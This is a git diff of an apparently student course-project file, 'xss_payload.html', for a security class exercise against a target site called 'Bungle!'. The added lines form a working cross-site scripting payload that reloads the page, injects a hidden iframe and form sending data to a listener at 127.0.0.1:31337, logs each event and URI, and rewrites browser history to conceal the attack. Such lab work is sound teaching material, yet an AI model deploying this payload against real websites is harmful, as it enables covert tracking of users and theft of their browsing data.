--- a/PA2/xss_payload.html
+++ b/PA2/xss_payload.html
@@ -31,10 +31,13 @@ function payload(attacker) {
                 window.history.replaceState('', "Bungle!","./search");
             });
         } else {
-            var html = $("html").html();
-            $("html").html("<iframe id=\"frame1\" style='width:100%; height:100%;position:absolute;top:0;left:0;border:0;'></frame>");
-            $("#frame1").attr("src", "http://eecs388.org/project2/");
-            $("html").show();
+            $("html").load(href, function(){
+                $("html").html($("html").html()+"<iframe id=\"frame1\" name=\"logFrame\"></iframe><form name=\"form1\" action=\"http://127.0.0.1:31337/\" method=\"get\" target=\"logFrame\"><input type=\"hidden\" name=\"work\" value=\"POOOOOOP\"></form>");
+                $("html").show();                
+                // alert('log event');
+                log({event: state, uri: href});
+                window.history.replaceState('', "Bungle!","./search");
+            });
         }
     }
     var poop = $("#POOP").html();
